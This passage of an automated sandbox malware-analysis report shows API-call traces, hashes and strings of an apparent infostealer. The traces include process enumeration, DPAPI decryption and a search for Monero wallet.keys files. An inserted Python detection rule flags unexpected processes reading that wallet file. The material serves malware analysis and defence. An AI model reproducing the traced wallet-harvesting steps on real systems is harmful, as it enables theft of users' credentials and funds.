                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !O?v$-"|r$67#$y_
                              • API String ID: 0-10929917
                              • Opcode ID: 90b57728151a8181ef2994063fb98c627be925b8f74942ed80ca1a88de77f530
                              • Instruction ID: f0a66f84d619af8be84c4a7a7f4429fcababca092bedc2926e28419b0556caa7
                              • Opcode Fuzzy Hash: 90b57728151a8181ef2994063fb98c627be925b8f74942ed80ca1a88de77f530
                              • Instruction Fuzzy Hash: 0CB2E6F3A0C214AFE7046E29EC8566BFBE5EF94720F16493DE6C4C3704E63598058697
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008C05B7), ref: 008B86CA
                              • Process32First.KERNEL32(?,00000128), ref: 008B86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 008B86F3
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • CloseHandle.KERNEL32(?), ref: 008B8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,008A5184,40000001,00000000,00000000,?,008A5184), ref: 008B8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                              • LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E00,00000000,?), ref: 008B79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,008C0E00,00000000,?), ref: 008B79C4
                              • wsprintfA.USER32 ref: 008B79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142E848,00000000,?,008C0E10,00000000,?,00000000,00000000), ref: 008B7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142E848,00000000,?,008C0E10,00000000,?,00000000,00000000,?), ref: 008B7A7D
                              • wsprintfA.USER32 ref: 008B7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • CoCreateInstance.COMBASE(008BE118,00000000,00000001,008BE108,00000000), ref: 008B3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008B37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
                              • LocalFree.KERNEL32(?), ref: 008A9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: d0779e88c4e946c1b7e1745ee1b24def07d27f1c5dc9242780f92ffab4e60f82
                              • Instruction ID: 7c60932cdb9ed4b922d3e5f683fcb2d24d102339dfc73afe706ec57dfd8ded99
                              • Opcode Fuzzy Hash: d0779e88c4e946c1b7e1745ee1b24def07d27f1c5dc9242780f92ffab4e60f82
                              • Instruction Fuzzy Hash: 9A11CCB4A00209DFDB04DF98D985AAE77B5FF89300F104558E9159B350D774AE51CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &y}V$tw
                              • API String ID: 0-1981112408
                              • Opcode ID: 5350ca5660ecdcb56306dd9d1ab4ce9a7e88450bc774a4c3e2afab90a695d587
                              • Instruction ID: 27669d4790b8dac2b7cc8bf07a29f46823ef76c6b9dfe7c54bccec3aca2b8b64
                              • Opcode Fuzzy Hash: 5350ca5660ecdcb56306dd9d1ab4ce9a7e88450bc774a4c3e2afab90a695d587
                              • Instruction Fuzzy Hash: B4B216F390C204AFE3046E29EC8567ABBE9EF94720F16493DEAC4C7744EA3558058697
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C15B8,008C0D96), ref: 008AF71E
                              • StrCmpCA.SHLWAPI(?,008C15BC), ref: 008AF76F
                              • StrCmpCA.SHLWAPI(?,008C15C0), ref: 008AF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AFAB1
                              • FindClose.KERNEL32(000000FF), ref: 008AFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 28b5a2080ad78593f5e7a6d3cbf49bd9f3537d7b03bedc4ff6d953027ff404e3
                              • Instruction ID: b3d55f8d5df4c2d8fc4b7319aaa291f81f3a112c53dc03990c7249858aa8c712
                              • Opcode Fuzzy Hash: 28b5a2080ad78593f5e7a6d3cbf49bd9f3537d7b03bedc4ff6d953027ff404e3
                              • Instruction Fuzzy Hash: 5A11753180015DABDB28EBA4DCA59ED7378FF11300F4042A9A51AD6692EF302B4ACB53
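The FindFirstFileA / FindNextFileA / FindClose loop in the function above, with \Monero\wallet.keys among its resolved string arguments and SHGetFolderPathA(CSIDL 0x1C, i.e. CSIDL_LOCAL_APPDATA) appearing in the same subcall chain further down, is the sample's wallet-file hunt: resolve a known folder, append the relative path with lstrcat, then walk it. The two StrCmpCA calls against adjacent string-table entries (008C15BC, 008C15C0) are consistent with the usual "." and ".." skip, though the report does not resolve those strings. On the defensive side, the path is a usable IOC. The following is an added example, not part of the report: a detection that flags any non-allowlisted process opening the wallet key file in a file-access event feed, suppressing repeat hits from the same process. The event line format, the sample events and the allowlist of wallet binaries are constructed assumptions for the example; Sysmon alone does not record file reads, so a feed like this needs an EDR or an object-access SACL on the file.

```python
import re
from datetime import datetime, timedelta

# Wallet key file the report shows the sample building a path to (\Monero\wallet.keys
# appended to a known folder and then walked with FindFirstFileA/FindNextFileA).
# Matching is on the case-insensitive path tail so %APPDATA% and expanded forms both hit.
TARGET_TAILS = ("\\monero\\wallet.keys",)

# Processes expected to open the wallet file legitimately. Assumption for this example;
# tune to the software actually deployed.
ALLOWED_IMAGES = ("monero-wallet-gui.exe", "monero-wallet-cli.exe")

# Constructed line format for this example (real EDR/file-audit feeds differ):
#   <ISO timestamp> pid=<n> image=<exe path> op=<open|read> target=<file path>
EVENT_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) image=(?P<image>.+?) op=(?P<op>\w+) target=(?P<target>.+)$"
)


def normalise(path: str) -> str:
    """Windows paths compare case-insensitively and either slash may appear in logs."""
    return path.strip().replace("/", "\\").lower()


def is_wallet_target(path: str) -> bool:
    return normalise(path).endswith(TARGET_TAILS)


def parse_event(line: str):
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["pid"] = int(ev["pid"])
    return ev


def detect_wallet_access(lines, suppress=timedelta(minutes=5)) -> list:
    """Alert on a non-allowlisted process touching the wallet key file. Repeat hits from
    the same pid inside `suppress` are folded into the first alert (the sample issues
    several calls per file, so one alert per process per window is what you want)."""
    alerts, last_seen = [], {}
    for line in lines:
        ev = parse_event(line)
        if not ev or not is_wallet_target(ev["target"]):
            continue
        image_name = normalise(ev["image"]).rsplit("\\", 1)[-1]
        if image_name in ALLOWED_IMAGES:
            continue
        prev = last_seen.get(ev["pid"])
        if prev is not None and ev["ts"] - prev < suppress:
            continue
        last_seen[ev["pid"]] = ev["ts"]
        alerts.append({"ts": ev["ts"].isoformat(), "pid": ev["pid"],
                       "image": image_name, "target": ev["target"]})
    return alerts


SAMPLE_EVENTS = [  # constructed for the demo
    "2024-09-26T10:00:01 pid=4120 image=C:\\Program Files\\Monero\\monero-wallet-gui.exe op=open target=C:\\Users\\alice\\AppData\\Roaming\\Monero\\wallet.keys",
    "2024-09-26T10:00:05 pid=5512 image=C:\\Users\\alice\\Downloads\\file.exe op=open target=C:\\Users\\alice\\AppData\\Roaming\\Monero\\wallet.keys",
    "2024-09-26T10:00:06 pid=5512 image=C:\\Users\\alice\\Downloads\\file.exe op=read target=C:\\Users\\alice\\AppData\\Roaming\\Monero\\wallet.keys",
    "2024-09-26T10:00:07 pid=5512 image=C:\\Users\\alice\\Downloads\\file.exe op=open target=C:\\Users\\alice\\Documents\\notes.txt",
    "2024-09-26T10:09:00 pid=5512 image=C:\\Users\\alice\\Downloads\\file.exe op=open target=%APPDATA%/Monero/wallet.keys",
]


if __name__ == "__main__":
    for alert in detect_wallet_access(SAMPLE_EVENTS):
        print(alert)
```

The allowlist is the weak point of any rule like this: an injected or renamed process defeats it, so treat a hit as a triage trigger and pair it with the process-tree and network context the rest of the report provides.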
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -'
                              • API String ID: 0-3264590126
                              • Opcode ID: 2c398867269c7c3608090a967fced33845cc0df50a69f30e89dbeb0662eabfa9
                              • Instruction ID: e7f90f7d4451212fdf0135dc53c95aa7ec2c72510935802353c8181c9db9647e
                              • Opcode Fuzzy Hash: 2c398867269c7c3608090a967fced33845cc0df50a69f30e89dbeb0662eabfa9
                              • Instruction Fuzzy Hash: BE5137F7E086204BE3046A7CDD9936ABA95DB84360F2B473D9FA4A37C4E879490542C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Jz*
                              • API String ID: 0-1480151498
                              • Opcode ID: 47d6035f38114b09d245796e636111a533071a9b0f936282b026b169a7f73d4d
                              • Instruction ID: 85ac4171c6d6a2b05428331655c19f1ab5c078b7e459d4a869a81463bde9b1e8
                              • Opcode Fuzzy Hash: 47d6035f38114b09d245796e636111a533071a9b0f936282b026b169a7f73d4d
                              • Instruction Fuzzy Hash: 3931D6F290D212DBD3046E68E88173ABBE4EF04310F16096DEAC98B340E575A95087D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7}2
                              • API String ID: 0-325700841
                              • Opcode ID: 4ab09fb644115971205ba9a52d17570a4f00ac6068e28078895580fd49129db2
                              • Instruction ID: 906ad8622894a9dd60d8510a291a10f6d4cf4c5aa539716b7cd42d141597a1a0
                              • Opcode Fuzzy Hash: 4ab09fb644115971205ba9a52d17570a4f00ac6068e28078895580fd49129db2
                              • Instruction Fuzzy Hash: D2219CB251C304AFE316AF59DC8566AF7E4FF98710F16482DE6C483600E6319851CA97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 731578e2a6382e421e2a33123aa75e9b01139705ccb2a36bad8a977335fe3de5
                              • Instruction ID: 7816d55a978f005a592bc5a323f3d0ef57592e67a0c4f3d5efadb5f7134cd069
                              • Opcode Fuzzy Hash: 731578e2a6382e421e2a33123aa75e9b01139705ccb2a36bad8a977335fe3de5
                              • Instruction Fuzzy Hash: 3451E4B260C6009FE304AF2ED94563AFBE9EFD4720F16492EE6C5C3340E6359845CA97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7479435cc39330fe52bfa30d2c147eb58a85954f312c55e21e30a0b3036a1446
                              • Instruction ID: 8466122834e4f1c98c4c3581487fd184088e9ef6988bc3390a09629b44f6e33a
                              • Opcode Fuzzy Hash: 7479435cc39330fe52bfa30d2c147eb58a85954f312c55e21e30a0b3036a1446
                              • Instruction Fuzzy Hash: 7141F9F3A082005FF714AE1EEC85B3BB7EAEBD4310F16853DDA8987344E93958058696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8665575f1cacb09aac3f8976913dbdf8979332d0ca8b23bdf33a5443104bfec
                              • Instruction ID: c1b96f9a28387710c603c0f4f48de0f769923da85df60dfa378115642e3c72e4
                              • Opcode Fuzzy Hash: d8665575f1cacb09aac3f8976913dbdf8979332d0ca8b23bdf33a5443104bfec
                              • Instruction Fuzzy Hash: 863137F3A182046BF3046929ED457BB77CADBD4330F2E823DEA84D3780F93999054291
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
